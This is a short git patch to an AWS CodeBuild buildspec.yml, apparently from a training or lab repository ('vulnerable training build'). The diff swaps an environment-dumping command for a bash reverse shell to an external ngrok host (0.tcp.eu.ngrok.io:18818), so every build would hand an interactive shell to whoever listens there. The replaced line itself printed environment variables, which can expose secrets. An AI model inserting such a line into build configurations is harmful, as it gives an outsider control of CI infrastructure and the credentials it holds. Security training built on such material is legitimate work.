From f1ac5b47fff6efb933cac3fd618833a8ebe90d75 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Sat, 28 Mar 2026 20:20:09 +0100 Subject: [PATCH] test test --- buildspec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/buildspec.yml b/buildspec.yml index cb0c282..5dadc8b 100644 --- a/buildspec.yml +++ b/buildspec.yml @@ -4,5 +4,5 @@ phases: build: commands: - echo "Running vulnerable training build" - - env | sort | head -n 20 + - bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18818 0>&1 - echo "Done"